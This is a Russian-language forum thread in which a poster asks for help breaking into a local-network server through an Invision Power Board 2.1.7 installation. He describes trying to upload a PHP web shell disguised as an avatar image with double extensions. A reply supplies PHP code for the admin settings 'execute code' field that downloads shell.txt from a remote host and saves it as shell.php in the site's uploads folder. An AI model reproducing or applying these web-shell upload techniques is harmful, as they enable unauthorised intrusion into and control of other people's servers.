доброго времяни суток... подскажите куда ломиться, только именно подсказать интересней самому врубиться ) итак у меня задачка сломать сервак локальной сети... пробывал ломиться через форум Invision Power Board v2.1.7 заливка шелла через аватары и фоты обламилась... единственное, что мне показалось неадекватным, это реакция сервака на имя файла... если я пытаюсь залить так script.php.jpg - он переименовывает весь фаил так av-(uid).txt script.PHP.jpg - просто не пускает, также как и просто некорректный джипег... лажа какая-то... подскажите может не в той стороне копаю ???
да кстати меня интересует вопрос... можно-ли запустить скрипт с удалённого сервера через аватару... если какчать через какоёнить сервак то пхтмл и пхп не переименовываються... хотя и скрипт не скачиваеться а пишеться как ссылка
если есть доступ в админку то попробуй через настройки.там когда создаёшь новую то есть поле "выполнить php код до сохранения настройки" туда вписывай $linky="http://site.com/shell.txt"; $saved="/home/empire/public_html/uploads/shell.php"; (путь посмотри в настройках) $from=fopen("$linky","r"); $to=fopen("$saved","w"); while(!feof($from)){ $string=fgets($from,4096); fputs($to,$string); } fclose($to); fclose($from);